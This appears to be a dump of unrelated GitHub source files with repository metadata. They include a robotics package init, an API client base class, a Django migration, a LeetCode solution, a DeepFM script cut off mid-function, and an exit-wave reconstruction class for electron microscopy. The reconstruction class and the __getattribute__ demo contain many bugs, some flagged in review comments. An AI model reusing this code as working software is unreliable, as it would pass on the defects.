customLM = CustomModel(trainingCorpus)
customSpell = SpellCorrect(customLM, trainingCorpus)
customOutcome = customSpell.evaluate(devCorpus)
print str(customOutcome)
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | noreply@github.com |
4911d82b51dc9ec4b68a07e2dc8f0b5229a842e6 | 099f8740e61878c92c067e96d76ccb014cd342c3 | /robovat/simulation/__init__.py | 718ea92343dbbbccf8f49643d7c02676671f222b | [
"MIT"
] | permissive | UT-Austin-RPL/robovat | c52d7f0b5b4244ad19fc7c15c876e005626bf182 | c333ce7f1d7b156bedf28c3b09793f5487b6690a | refs/heads/master | 2023-01-06T12:32:39.304293 | 2020-11-12T20:12:25 | 2020-11-12T20:12:25 | 290,521,446 | 7 | 2 | MIT | 2020-08-28T17:33:52 | 2020-08-26T14:37:23 | null | UTF-8 | Python | false | false | 381 | py | from robovat.simulation.base import Base
from robovat.simulation.body import Body
from robovat.simulation.constraint import Constraint
from robovat.simulation.controllable_body import ControllableBody
from robovat.simulation.entity import Entity
from robovat.simulation.joint import Joint
from robovat.simulation.link import Link
from robovat.simulation.simulator import Simulator
| [
"kuanfang@outlook.com"
] | kuanfang@outlook.com |
c06a72838532445c98d815aec09855d509744d32 | c45e0cac6fbdb3b2bd56a9976f291b686f2d1a0b | /base.py | f3a45e1305486b75afeaed9ab52507e5dd615eca | [] | no_license | Marcel-Zaripov/hotel_api_client | f9cd975c2d4709169eb89ad98d77d187ea913779 | c3ea4996fbbcbac828f59822fd94dc6e0b5c5761 | refs/heads/master | 2021-04-11T09:37:36.463628 | 2020-03-21T16:14:40 | 2020-03-21T16:14:40 | 249,008,435 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 587 | py | class ClientBase(object):
""" Other endpoints are build on top
"""
endpoint = "/"
    def __init__(self, client):
        # Prefix this endpoint's fragment with the owning client's endpoint.
        self.client = client
        self.endpoint = client.endpoint + self.endpoint
    @property
    def transport(self):
        """The owning client's transport.

        return type: transport.Transport
        """
        return self.client.transport
def _url(self, *params):
url = (self.endpoint + ''.join(
'/' + str(p)
for p in params
if p is not None))
return url
| [
"marsel281292@gmail.com"
] | marsel281292@gmail.com |
1e5a9be74f78ccb91bf9ebd626783bf8123fcbaf | 8e2e28a191fa5ec5a6c070ec7e9ccad98c8b4a0b | /jiaocheng/02-python核心编程/05-getattribute属性.py | 0751dbd47c6556fed35b260ab822029c2dbcc613 | [
"Apache-2.0"
] | permissive | kellanfan/python | 4cd61cbc062e2eee3a900fa7447ca5f0b8f1a999 | 912dc05a3bd0ded9544166a68da23ca0a97b84da | refs/heads/master | 2023-04-06T03:04:38.851928 | 2023-04-01T02:45:56 | 2023-04-01T02:45:56 | 65,542,280 | 3 | 5 | null | null | null | null | UTF-8 | Python | false | false | 896 | py | class Itcast(object):
    def __init__(self,subject1):
        # subject1 comes from the caller; subject2 is fixed to 'cpp'.
        self.subject1 = subject1
        self.subject2 = 'cpp'
    # Interceptor for every attribute access -- used here to log lookups.
    def __getattribute__(self,obj):
        print("====1>%s"%obj)
        if obj == 'subject1':
            # Accesses to subject1 are logged and redirected to a fixed value.
            print('log subject1')
            return 'redirect python'
        else: # comment out these 2 lines when testing, and subject2 will not be found
            temp = object.__getattribute__(self,obj)
            print("====2>%s"%str(temp))
            # return temp
            # NOTE(review): with `return temp` commented out, this branch
            # returns None, so every attribute except subject1 resolves to None.
    def show(self):
        # A plain method; its lookup still goes through __getattribute__ above.
        print('this is Itcast')
s = Itcast("python")
print(s.subject1)  # intercepted: logs, then prints 'redirect python'
print(s.subject2)  # else branch has no return, so this prints None
# NOTE(review): the lookup of `show` also returns None (see __getattribute__),
# so calling it raises TypeError: 'NoneType' object is not callable.
s.show()
#1. First the `show` attribute lookup runs -- the result should be a method
#2. then that result is called with ()
# In other words, attributes and methods on an object are both references;
# a method is just a name bound to a function, e.g.:
# import types
# p1.eat = types.MethodType(eat, p1)
| [
"icyfk1989@163.com"
] | icyfk1989@163.com |
414ed28465cf60ea43c6d12ba7607866090bf80f | 97f6a698b73d1759b90054e1600ff7498a7cc900 | /Node/index.py | 8250f9169ee98fb978d29f3d6d0d441b54fc4f9c | [] | no_license | kwishna/LearnJs | 0a18cc9d26df7cc7617584ba7d8fa93cbc6a700f | 9dcc7fbedc4e9799f1bb73666e378a8b339efaa5 | refs/heads/master | 2022-12-22T13:12:52.760580 | 2019-12-03T13:42:49 | 2019-12-03T13:42:49 | 225,630,581 | 0 | 0 | null | 2022-12-11T15:48:55 | 2019-12-03T13:46:38 | JavaScript | UTF-8 | Python | false | false | 90 | py | import wget
# Download a file from a go.microsoft.com redirect link and save it as ./mukk.xlsx.
wget.download('https://go.microsoft.com/fwlink/?LinkID=521962', './mukk.xlsx')
"krishna.singh16@wipro.com"
] | krishna.singh16@wipro.com |
ee2b56937ab41dce748d91597d495e18e0016a07 | e0ed7f8eb422ee85f1d7a4b69f6365ba543a5ca7 | /client_server_app/lesson_6/when_deco_is_called.py | 996b80f8d8c61625978a339c7fcdd4ac5ff34b0c | [] | no_license | tataurova/lessons-gb-python | 5e3ce6a4eef86fe20c962a011050004d9e8daedb | 60c7d9fd414dd1177b8a10e7683906c49e126a80 | refs/heads/master | 2020-05-05T12:31:44.250108 | 2019-07-12T20:46:55 | 2019-07-12T20:46:55 | 180,032,871 | 0 | 0 | null | 2019-05-06T07:39:11 | 2019-04-07T22:46:23 | HTML | UTF-8 | Python | false | false | 402 | py |
registry = []
def register(func):
print(' running register ( %s ) ' % func)
registry.append(func)
return func
@register
def f1():
print('running f1()')
@register
def f2():
print('running f2()')
def f3():
print('running f3()')
def main():
print(' running main()')
print(' registry ->', registry)
f1()
f2()
f3()
if __name__ == '__main__':
main()
| [
"tataurovaoe@yandex.ru"
] | tataurovaoe@yandex.ru |
380d3a2189f61ad5dc3288eb0e332b61aad92215 | 3a3f8a8c1e5cf039856c9da87161d21050892137 | /osiete_osint/apps/service/migrations/0020_auto_20210512_2220.py | cb00f138dcc322918bb2a16ffcc845745f47be28 | [] | no_license | yuta519/osiete_osint | 92237fad0584a82fcacacfd328151889640c7b8c | 7ba7a47a2beef91d66ac00d2a2a7f1d97f7fa912 | refs/heads/main | 2023-06-02T21:15:29.516912 | 2021-06-23T00:23:25 | 2021-06-23T00:23:25 | 352,069,857 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 351 | py | # Generated by Django 3.1.7 on 2021-05-12 13:20
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated migration: renames DataSearchHistry to OsintSearchHistry.

    Generated by Django; do not edit by hand.  The 'Histry' spelling (sic)
    matches the model names used by the app.
    """
    dependencies = [
        ('service', '0019_auto_20210428_1620'),
    ]
    operations = [
        migrations.RenameModel(
            old_name='DataSearchHistry',
            new_name='OsintSearchHistry',
        ),
    ]
| [
"yuta519.ka23tf@docomo.ne.jp"
] | yuta519.ka23tf@docomo.ne.jp |
8a660027140e9e78abc8c1cef9034e5860eafbef | fb613b77989f1c7db1cb4e149adf0430f7a1404a | /ewrec_class.py | 737298189a632a50750821fe3793b71a903c1388 | [
"MIT"
] | permissive | Jeffrey-Ede/AI-CV-Automation-Elect-Micr | ce64be88d8b76d88c2e29158fa2cd5cdf4d65a7c | b53072132046ff6f1e8861b96c4263abbee2b6eb | refs/heads/AI-CV-Automation-Electr-Micr | 2021-04-27T09:37:44.295030 | 2020-09-14T15:39:35 | 2020-09-14T15:39:35 | 122,518,865 | 3 | 0 | null | 2018-02-28T17:36:01 | 2018-02-22T18:34:05 | Python | UTF-8 | Python | false | false | 17,188 | py | import numpy as np
import glob
import cv2
import arrayfire as af
from skimage.measure import compare_ssim as ssim
from scipy.misc import imread
from scipy.optimize import minimize
class Utility(object):
    """Static helpers for exit-wave reconstruction.

    Covers NumPy <-> ArrayFire transfer, image rescaling/display via OpenCV,
    saving arrays, and padded FFT helpers.  All methods are static; the class
    only namespaces them.
    """

    def __init__(self):
        pass

    @staticmethod
    def np_to_af(np_arr, dtype=None):
        """Copy a NumPy array onto the device as an ArrayFire array.

        dtype defaults to af.Dtype.f32; the default is resolved lazily so the
        class can be defined without touching ArrayFire at import time.
        """
        if dtype is None:
            dtype = af.Dtype.f32
        return af.Array(np_arr.ctypes.data, np_arr.shape, np_arr.dtype.char).as_type(dtype)

    @staticmethod
    def fft_shift(fft):
        """Centre the zero-frequency component (ArrayFire fftshift equivalent)."""
        return af.shift(fft, fft.dims()[0]//2 + fft.dims()[0]%2, fft.dims()[1]//2 + fft.dims()[1]%2)

    @staticmethod
    def scale0to1(img):
        """Rescale image between 0 and 1; a constant image maps to all 0.5."""
        lo = np.min(img)
        hi = np.max(img)
        if lo == hi:
            # Note: fills the caller's array in place, as the original did.
            img.fill(0.5)
        else:
            img = (img - lo) / (hi - lo)
        return img.astype(np.float32)

    @staticmethod
    def disp_af(arr):
        """Display an ArrayFire array in an OpenCV window (blocks on keypress)."""
        # Fixed: was an unmarked instance-style method calling scale0to1
        # unqualified, which raised NameError when invoked.
        cv2.namedWindow('CV_Window', cv2.WINDOW_NORMAL)
        cv2.imshow('CV_Window', Utility.scale0to1(arr.__array__()))
        cv2.waitKey(0)
        return

    @staticmethod
    def af_phase(img):
        """Map values elementwise: x stays x below pi, otherwise pi - x."""
        f = lambda x: x if x < np.pi else np.pi-x
        vecf = np.vectorize(f)
        # Fixed: previously returned vecf(phase) with `phase` undefined.
        return vecf(img)

    @staticmethod
    def disp_af_complex_amp(fft, log_of_fft=True):
        """Show the (optionally log-scaled) amplitude of a complex array."""
        amp = np.log(np.absolute(fft)) if log_of_fft else np.absolute(fft)
        cv2.namedWindow('CV_Window', cv2.WINDOW_NORMAL)
        cv2.imshow('CV_Window', Utility.scale0to1(amp))
        cv2.waitKey(0)
        return

    @staticmethod
    def disp_af_complex_phase(fft):
        """Show the phase of a complex array."""
        cv2.namedWindow('CV_Window', cv2.WINDOW_NORMAL)
        cv2.imshow('CV_Window', Utility.scale0to1(Utility.af_phase(fft)))
        cv2.waitKey(0)
        return

    @staticmethod
    def save_af_as_npy(arr, filename, save_loc=""):
        """Save an ArrayFire array as `save_loc/filename[.npy]`.

        Fixed: the extension check compared filename[-4:-1] (3 chars) against
        ".npy" so it always appended, np.save appended ".npy" a second time,
        and the empty default save_loc crashed on save_loc[-1].
        """
        if not filename.endswith(".npy"):
            filename += ".npy"
        if save_loc and not save_loc.endswith("/"):
            save_loc += "/"
        np.save(save_loc + filename, arr.__array__())
        return

    @staticmethod
    def get_radial_freq_hist(img, mean=1.0): #Currently unused
        """Radially-binned sum of the image's centred FFT magnitudes."""
        abs_shifted_fft = np.abs(np.fft.fftshift(np.fft.fft2(img)))
        rows = cols = int(abs_shifted_fft.shape[0])
        mid_row = mid_col = int(np.ceil(abs_shifted_fft.shape[0]/2))
        max_rad = int(np.ceil(np.sqrt((mid_row)**2 + (mid_col)**2)))+1
        radial_profile = np.zeros(max_rad)
        for col in range(cols):
            for row in range(rows):
                radius = np.sqrt((row-mid_row+1)**2 + (col-mid_col+1)**2)
                idx = int(np.ceil(radius))
                radial_profile[idx] += abs_shifted_fft[col][row]
        return radial_profile

    @staticmethod
    def af_padded_fft2(img, pad_val=0., pad_periods=1):
        """2D FFT of `img` padded with pad_val to (1+pad_periods) periods.

        Fixed: the pad constant was hard-coded to 0., ignoring pad_val.
        """
        side = img.dims()[0]
        padded_img = af.constant(pad_val, (1+pad_periods)*side, (1+pad_periods)*side)
        padded_img[:side, :side] = img
        return af.fft2(padded_img)

    @staticmethod
    def af_unpadded_ifft2(fft, pad_periods=1):
        """Inverse FFT that crops away the padding added by af_padded_fft2."""
        side = fft.dims()[0] // (1+pad_periods)
        return af.ifft2(fft)[:side, :side]
###########################################################################################
class EWREC(Utility):
    """Exit-wave reconstruction from a focal series of TEM images.

    Loads a .tif focal series, aligns/crops the images, estimates each
    member's defocus, then iteratively reconstructs the complex exit wave.
    NOTE(review): many methods below reference names that do not exist as
    written (flagged inline); this class does not look runnable in its
    current state and needs a pass to resolve them.
    """
    def __init__(self,
                 stack_dir,
                 wavelength,
                 rel_pos=None,
                 rel_pos_method="phase_corr",
                 series_type = "cubic",
                 series_alternating=True, #Focuses alternating about in-focus position
                 series_middle = None, #Middle focus index only needed if series alternates about centre. If not
                 #provided, the halfway index will be chosen
                 series_increasing=True,
                 defocuses=None,
                 defocus_search_range=[0., 10.], #nm**-1?  NOTE(review): mutable default argument
                 reconstruction_side=None,
                 defocus_sweep_num=10, #Number of defocuses to try initial sweep to find the defocus
                 defocus_search_criteria = ["gradient_plateau"],
                 preprocess_fn=None,
                 param_refinement = False, #Time-consuming refinement of relative positions and defocus values
                 nn_refinement=False, #TODO
                 report_progress=True,
                 pad_periods=1,
                 pad_val=0.): #Number of periods of signal to pad it by for fft
        self.stack_dir = stack_dir
        #NOTE(review): unqualified call and `dir` is the builtin here --
        #presumably self.get_stack_from_tifs(self.stack_dir) was intended.
        self.stack = get_stack_from_tifs(dir)
        if preprocess_fn:
            self.stack = preprocess_fn(self.stack)
        self.stack_side = self.stack[0].shape[0]
        #NOTE(review): rel_pos_phase_corr is not defined on this class
        #(rel_pos_estimate below looks like the intended target).
        rel_pos_fns = {"phase_corr": self.rel_pos_phase_corr}
        rel_pos = rel_pos_fns["phase_corr"]()
        self.display_iter_nums = report_progress
        self.pad_periods = pad_periods
        self.pad_value = pad_value  #NOTE(review): NameError -- the parameter is `pad_val`
        #Focal series meta
        self.wavelength = wavelength
        self.series_type = focal_series_type  #NOTE(review): NameError -- the parameter is `series_type`
        self.series_alternating = series_alternating
        self.series_mid = series_middle
        self.series_increasing = series_increasing
        self.reconstruction_side = reconstruction_side
        self.rel_pos = rel_pos if rel_pos else self.rel_pos_estimate(rel_pos_method, as_cropping_centres=True)
        self.cropped_stack = self.crop_stack(self.rel_pos)
        if defocuses:
            self.defocuses = defocuses
        else:
            self.initial_defocus_sweep_num = defocus_sweep_num
            self.defocus_search_criteria = defocus_search_criteria
            self.defocus_search_range = [1.e9*x for x in defocus_search_range]
            self.defocuses = self.defocus_initial_estimate()
        if param_refinement:
            self.rel_pos, self.defocuses = self.refine_params()
        self.exit_wave = self.reconstruct()
    @staticmethod
    def get_stack_from_tifs(dir):
        # Load every .tif in `dir` as a float32 image.
        if dir[-1] != "/":
            dir += "/"
        files = glob.glob(dir+"*.tif")
        stack = [imread(file, mode='F') for file in files]
        return stack
    def crop_stack(self, centres, side=None, resize_crop_for_reconstruction=True):
        """Crop parts of images from a stack"""
        if not side:
            #Calculate largest possible crop side
            #NOTE(review): min_dist starts at 0 so `min_from_side < min_dist`
            #is never true and side ends up 0; also `stack_side` is
            #unqualified (the attribute is self.stack_side).
            min_dist = 0
            for centre in centres:
                min_from_side = np.min([centres[0], centres[1], stack_side-centres[0], stack_side-centres[1]])
                if min_from_side < min_dist:
                    min_dist = min_from_side
            side = int(2*min_dist)
        side_pow2 = int(np.log2(side))**2  #NOTE(review): computed but never used
        crops = []
        for img in self.stack:
            left = int(centres[0]-side)
            right = int(centres[0]+side)
            bottom = int(centres[1]-side)
            top = int(centres[1]+side)
            # Bilinear weights for the sub-pixel part of the centre.
            horiz_over = centres[0]-int(centres[0])
            vert_over = centres[1]-int(centres[1])
            prop_tl = horiz_over*vert_over
            prop_tr = (1.-horiz_over)*vert_over
            prop_bl = horiz_over*(1.-vert_over)
            prop_br = (1.-horiz_over)*(1.-vert_over)
            crop = np.zeros((side, side))
            #NOTE(review): writes to `zeros` (undefined -- the array is named
            #`crop`), and both zips range over `left`; the second presumably
            #should start at `bottom`.  The interpolated crop is then
            #discarded in favour of the plain slice appended below.
            for row, x in zip(range(side), range(left, left+side)):
                for col, y in zip(range(side), range(left, left+side)):
                    zeros[col][row] = prop_tl*img[y+1][x]+prop_tr*img[y+1][x+1]+prop_bl*img[y][x]+prop_br*img[y][x+1]
            crops.append(img[bottom:top,left:right])
        if resize_crop_for_reconstruction:
            return self.correct_cropped_stack_size(crops)
        else:
            return crops
    def correct_cropped_stack_size(self, stack):
        # NOTE(review): int(np.log2(x))**2 squares the log -- a power-of-two
        # side would be 2**int(np.log2(x)); also resizes self.cropped_stack
        # instead of the `stack` argument.
        crop_side = min(int(np.log2(stack[0].shape[0]))**2, int(np.log2(self.reconstruction_side))**2)
        cropped_stack = self.resize_stack(self.cropped_stack, crop_side)
        return cropped_stack
    @staticmethod
    def resize_stack(stack, side):
        # Resize every image in the stack to side x side.
        return [cv2.resize(img, (side, side)) for img in stack]
    def rel_pos_estimate(self, method="phase_corr", stack=None, rel_to_top_left=True):
        # Estimate inter-image shifts; optionally convert them to absolute
        # crop centres relative to the stack's top-left corner.
        if not stack:
            stack = self.stack
        rel_pos = []
        if method == "phase_corr":
            for i in range(1, len(self.stack)):
                # NOTE(review): cv2.phaseCorrelate returns ((dx, dy), response);
                # downstream indexing treats entries as flat (x, y) pairs -- confirm.
                rel_pos.append(cv2.phaseCorrelate(self.stack[i-1], self.stack[i]))
        if rel_to_top_left:
            #chain relative positions from the centermost and find the position closest to the mean
            #NOTE(review): [[0., 0.]]*n aliases one inner list n times, and
            #`for i, dx, dy in enumerate(...)` is an unpacking mismatch
            #(enumerate yields 2-tuples).
            pos = [[0., 0.]]*len(rel_pos)
            for i, dx, dy in enumerate(rel_pos[1:], 1):
                pos[i][0] = pos[i-1][0]+ rel_pos[i][0]
                pos[i][1] = pos[i-1][1]+ rel_pos[i][1]
            mean = [0., 0.]
            for i in range(len(pos)):
                mean[0] += pos[i][0]
                mean[1] += pos[i][1]
            mean[0] /= len(pos)
            mean[1] /= len(pos)
            dists = [(x-mean[0])**2+(y-mean[1])**2 for x, y in pos]
            idx = dists.index(min(dists))
            half_side = self.stack_side/2
            return [(half_side+mean[0]-x, half_side+mean[1]-y) for x, y in pos]
        else:
            return rel_pos
    @staticmethod
    def calc_transfer_func(side, wavelength, defocus_change, pad_periods = 0, spher_aber_coeff=None,
                           aperture_mask=None):
        # Contrast transfer function exp(i*phi) over reciprocal space, with an
        # optional spherical-aberration term and aperture mask.
        px_dim = 1.+pad_periods
        ctf_coeff = np.pi * wavelength * defocus_change
        rec_px_width = 1.0 / (side*px_dim)
        rec_origin = -1.0 / (2.0*px_dim)
        rec_x_dist = rec_origin + rec_px_width * af.range(side, side, dim=0)
        rec_y_dist = rec_origin + rec_px_width * af.range(side, side, dim=1)
        rec_dist2 = rec_x_dist*rec_x_dist + rec_y_dist*rec_y_dist
        ctf_phase = ctf_coeff*rec_dist2
        if spher_aber_coeff:
            ctf_phase += 0.5 * np.pi * wavelength**3 * spher_aber_coeff * rec_dist2**2
        ctf = af.cos(ctf_phase) + complex(0, 1)*af.sin(ctf_phase)
        if aperture_mask:
            ctf *= aperture_mask
        return ctf.as_type(af.Dtype.c32)
    def fft_to_diff(self, fft):
        # FFT layout -> diffraction-pattern layout (centred); self-inverse.
        return self.fft_shift(fft)
    def diff_to_fft(self, diff):
        return self.fft_to_diff(diff)
    def propagate_wave(self, img, ctf):
        # Multiply the padded FFT by the (centred) CTF and transform back.
        fft = self.af_padded_fft2(img, self.pad_value, self.pad_periods)
        ctf = self.diff_to_fft(ctf)
        propagation = self.af_unpadded_ifft2(fft*ctf, self.pad_periods)
        return propagation
    @staticmethod
    def propagate_to_focus(img, defocus, wavelength, pad_periods=0):
        # NOTE(review): staticmethod, but calls calc_transfer_func unqualified
        # and `self.propagate_wave` -- neither name resolves here.
        ctf = calc_transfer_func(
            side=int(img.dims()[0]*(1+pad_periods)),
            wavelength=wavelength,
            defocus_change=-defocus,
            pad_periods=pad_periods)
        return self.propagate_wave(img, ctf)
    @staticmethod
    def propagate_back_to_defocus(exit_wave, defocus, wavelength, pad_periods=0):
        # NOTE(review): `img` is undefined (parameter is exit_wave), and
        # `img.dims()[0](1+pad_periods)` is missing a `*`; calc_transfer_func
        # and propagate_wave are unqualified as above.
        ctf = calc_transfer_func(
            side=int(img.dims()[0](1+pad_periods)),
            wavelength=wavelength,
            defocus_change=defocus,
            pad_periods=pad_periods)
        return propagate_wave(exit_wave, ctf)
    @staticmethod
    def reconstruct(stack, defocuses=None, num_iter = 50, stack_on_gpu=False):
        """GPU accelerate wavefunction reconstruction and mse calculation"""
        # NOTE(review): declared @staticmethod yet reads self.defocuses,
        # self.display_iter_nums, self.wavelength and calls np_to_af /
        # self.propagate_* -- it is effectively an instance method.
        stack_gpu = stack if stack_on_gpu else [np_to_af(img) for img in stack]
        defocuses = defocuses if defocuses else self.defocuses
        width = stack[0].shape[0]
        height = stack[0].shape[1]
        exit_wave = af.constant(0, width, height)
        for i in range(num_iter):
            if self.display_iter_nums:
                print("Iteration {0} of {1}".format(i+1, num_iter))
            # Average the back-propagated members to estimate the exit wave...
            exit_wave = 0
            for img, idx in zip(stack_gpu, range(len(stack_gpu))):
                #print("Propagation {0} of {1}".format(idx+1, len(stack)))
                exit_wave += self.propagate_to_focus(img, defocuses[idx], self.wavelength)
            exit_wave /= len(stack)
            # ...then re-impose each member's measured amplitude at its defocus.
            for idx in range(len(stack)):
                amp = af.abs(stack_gpu[idx])
                stack_gpu[idx] = self.propagate_back_to_defocus(exit_wave, defocuses[idx], self.wavelength)
                stack_gpu[idx] = (amp / af.abs(stack_gpu[idx])) * stack_gpu[idx]
        return exit_wave
    def reconstruction_loss(self, stack_gpu, defocus_incr, defocus_ramp):
        # Reconstruct with trial defocuses and score how well the collapsed
        # (intensity) wavefunction reproduces each input image (max MSE).
        # NOTE(review): `reconstruct` is called unqualified here.
        defocuses = [incr*ramp for incr, ramp in zip(defocus_incr, defocus_ramp)]
        reconstruction = reconstruct(stack_gpu.copy(), defocuses, stack_on_gpu=True)
        #Use the wavefunction to recreate the original images
        deconstruction = [self.propagate_back_to_defocus(reconstruction, defocus, self.wavelength) \
                          for defocus in defocuses]
        losses = [0.]*len(stack_gpu)
        for i in range(len(losses)):
            collapse = af.abs(deconstruction[i])**2
            collapse *= af.mean(stack_gpu[i]) / af.mean(collapse)
            losses[i] = af.mean((stack_gpu[i]-collapse)**2)
        return np.max(losses)
    def defocus_initial_estimate(self):
        #Try various defocuses until one is found that matches the expected pattern
        stack = self.cropped_stack
        # Shape of the focal series: linear/quadratic/cubic ramp about `mid`.
        if self.series_type == "linear":
            gen = lambda x: x
        elif self.series_type == "quadratic":
            gen = lambda x: x**2
        elif self.series_type == "cubic":
            gen = lambda x: x**3
        mid = (self.series_mid if self.series_mid else len(stack) // 2) if self.series_alternating else 0
        defocus_dir = 1.0 if self.series_increasing else -1.0
        side = stack[0].shape[0]
        stack_gpu = [np_to_af(img, af.Dtype.c32) for img in stack]
        #NOTE(review): self.initial_sweep_num and self.search_range are never
        #set -- __init__ stores initial_defocus_sweep_num and
        #defocus_search_range instead.
        search_ramp = [(2**x / 2**self.initial_sweep_num) - 1 for x in range(0, self.initial_defocus_sweep_num)]
        m = self.search_range[1]-self.search_range[0]
        c = self.search_range[0]
        defocus_incr = [m*x+c for x in search_ramp]
        defocus_ramp = [defocus_dir*np.sign(x-mid)*gen(x-mid) for x in range(len(stack_gpu))]
        losses = [self.reconstruction_loss(stack_gpu, incr, defocus_ramp) for incr in defocus_incr]
        #Get the highest loss neigbouring the highest and refine using bilinear interpolation
        #NOTE(review): `dists` is undefined here -- `losses` looks intended.
        idx = dists.index(max(losses))
        if idx == 0:
            idx1, idx2 = idx, 0
        elif idx == self.initial_defocus_sweep_num-1:
            idx1, idx2 = 0, idx
        else:
            #NOTE(review): precedence bug -- this parses as a 3-tuple
            #(idx, <conditional>, idx) and raises on unpacking to two names.
            idx1, idx2 = idx, idx+1 if losses[idx-1] < losses[idx+1] else idx-1, idx
        losses = [losses[idx]]
        incr1 = defocus_incr[idx1]
        incr2 = defocus_incr[idx2]
        #NOTE(review): compares a list default (["gradient_plateau"]) against a
        #string, so this bisection branch never runs and the method can fall
        #through returning None.
        if self.defocus_search_criteria == "gradient_plateau":
            def condition(losses):
                if len(losses) == 1:
                    return True
                else:
                    return losses[-1] < losses[-2]
            while True:
                incr = 0.5*(incr1+incr2)
                losses.append(self.reconstruction_loss(stack_gpu, incr, defocus_ramp))
                if condition(losses):
                    incr1, incr2 = incr2, incr
                else:
                    return incr2
    def reconstruction_loss_arbitrary_params(self, centres, defocuses):
        # Loss for arbitrary crop centres + defocuses (used by refine_params).
        # NOTE(review): `deconstruction` is never computed in this method (the
        # back-propagation step from reconstruction_loss is missing), and
        # `reconstruct` is again called unqualified.
        stack = self.crop_stack(centres)
        stack_gpu = [np_to_af(img, af.Dtype.c32) for img in stack]
        reconstruction = reconstruct(stack_gpu.copy(), defocuses, stack_on_gpu=True)
        losses = [0.]*len(stack_gpu)
        for i in range(len(losses)):
            collapse = af.abs(deconstruction[i])**2
            collapse *= af.mean(stack_gpu[i]) / af.mean(collapse)
            losses[i] = af.mean((stack_gpu[i]-collapse)**2)
        return np.max(losses)
    def refine_params(self):
        # Jointly refine crop centres and defocuses with scipy.optimize.minimize.
        # Parameter vector layout: [x centres..., y centres..., defocuses...].
        x0 = [x for x, _ in self.rel_pos] + [y for _, y in self.rel_pos] + self.defocuses
        def loss(x):
            #NOTE(review): `len = len(x)` shadows the builtin and then calls
            #it; [[0.,0.]]*(n//3) aliases one inner list; and the x index
            #arithmetic uses the full length where n//3 looks intended.
            len = len(x)
            centres = [[0.,0.]]*(len//3)
            for i in range(len):
                centres[i][0] = x[i]
                centres[i][1] = x[i+len]
            return self.reconstruction_loss_arbitrary_params(centres, x[(2*len//3):])
        #NOTE(review): scipy.optimize.minimize has no `iter` keyword -- the
        #iteration cap belongs in options={'maxiter': 100}.
        refinement = minimize(
            loss,
            x0,
            method='trust-krylov',
            tol=1e-6,
            iter=100)
        x = refinement.x
        len = len(x)
        centres = [[0.,0.]]*(len//3)
        for i in range(len):
            centres[i][0] = x[i]
            centres[i][1] = x[i+len]
        return centres, x[(2*len//3):]
if __name__ == "__main__":
    # Example run: reconstruct the exit wave from a quadratic focal series.
    # NOTE(review): wavelength 2.51e-12 m presumably corresponds to the
    # microscope's accelerating voltage -- confirm against the instrument.
    ewrec = EWREC(
        stack_dir="E:/dump/stack1/",
        wavelength=2.51e-12,
        series_type = "quadratic",
        series_middle=6,
        series_increasing=True,
        reconstruction_side=512)
| [
"noreply@github.com"
] | noreply@github.com |
5117dc2fd127111959aeb4c16a0827934522c3b0 | 9835b6949fe4c8018de57aee531dedf1509337cc | /September_2020/sep_11_Maximun_Product_Subarray.py | 3c6c6472a9a78f7529c7993b6863e42fdb1b0150 | [] | no_license | jcai0o0/My_Leetcode_Solutions | f6edea0693d252a99e6507a1724a89763113f8a0 | 3fc909c01c6a345f625c9ab9e0f1584ea5fa8ab4 | refs/heads/master | 2023-01-01T04:08:33.929184 | 2020-10-17T02:01:56 | 2020-10-17T02:01:56 | 289,094,613 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 423 | py | class Solution:
def maxProduct(self, nums: List[int]) -> int:
if not nums:
return 0
N = len(nums)
f = [0] * N
g = [0] * N
f[0] = g[0] = res = nums[0]
for i in range(1, N):
f[i] = max(f[i-1] * nums[i], nums[i], g[i-1] * nums[i])
g[i] = min(f[i-1] * nums[i], nums[i], g[i-1] * nums[i])
res = max(res, f[i])
return res | [
"44845593+jcai0o0@users.noreply.github.com"
] | 44845593+jcai0o0@users.noreply.github.com |
e1beec084c59e4ff5804adb437d82d4db283c86a | b9d6dfd7f115b92a5372d1f22517c0ff8e99f4de | /Algorithm Practice/DeepFM/DeepFm.py | 80d2bb0d52701eef5b1edb728d2132c1d54ed9b0 | [] | no_license | yespon/CTR-Prediction | 8c0db3216eb96852a7e9ed523fa4035337fd5980 | 9f9afad89eb35c6e6bfe3b619f128714de6216a2 | refs/heads/master | 2020-04-17T06:44:53.760862 | 2019-01-12T08:30:59 | 2019-01-12T08:30:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,253 | py | import gc
import numpy as np
import pandas as pd
import tensorflow as tf
##################################
# 0. Functions
##################################
class Config(object):
    """
    Holds configuration / hyper-parameters for the DeepFM model.

    Fixed: the original assigned to ``self`` directly in the class body
    (outside any method), which raises NameError the moment the module is
    imported.  The assignments now live in ``__init__``.
    """
    def __init__(self):
        # Filled in after FeatureDictionary() has been run.
        self.feature_dict = None
        self.feature_size = None
        self.field_size = None
        # Model hyper-parameters.
        self.embedding_size = 8
        self.epochs = 20
        # Resolved at instantiation time, so tensorflow must be importable
        # when Config() is constructed.
        self.deep_layers_activation = tf.nn.relu
        self.loss = "logloss"
        self.l2_reg = 0.1
        self.learning_rate = 0.1
def FeatureDictionary(dfTrain=None, dfTest=None, numeric_cols=None, ignore_cols=None):
    """
    Assign a feature index to every post-one-hot feature dimension.

    1. Each distinct value of a categorical column becomes its own dimension,
       so one original column maps to several indices.
    2. A numeric column stays a single dimension and keeps a single index.

    :param dfTrain: raw training set
    :param dfTest: raw test set
    :param numeric_cols: columns treated as numeric
    :param ignore_cols: columns excluded from indexing; every remaining
        column is treated as categorical
    :return: (feat_dict, feat_size)
        feat_size: total number of feature dimensions after one-hot encoding.
        feat_dict: {column name: value}.  For a numeric column the value is
        the int index of its single dimension; for a categorical column it is
        a dict mapping each observed value to that value's dimension index,
        for fast lookup by (column, value).
    """
    assert not (dfTrain is None), "train dataset is not set"
    assert not (dfTest is None), "test dataset is not set"
    # Guard against the None defaults so the `in` checks below cannot crash.
    numeric_cols = numeric_cols if numeric_cols is not None else []
    ignore_cols = ignore_cols if ignore_cols is not None else []
    # Indices must be assigned over train and test together so values that
    # only appear in the test set still get a dimension.
    df = pd.concat([dfTrain, dfTest], axis=0)
    feat_dict = {}
    # Next index to hand out.
    total_cnt = 0
    for col in df.columns:  # fixed: was `df.colums` (AttributeError)
        if col in ignore_cols:  # ignored columns get no index
            continue
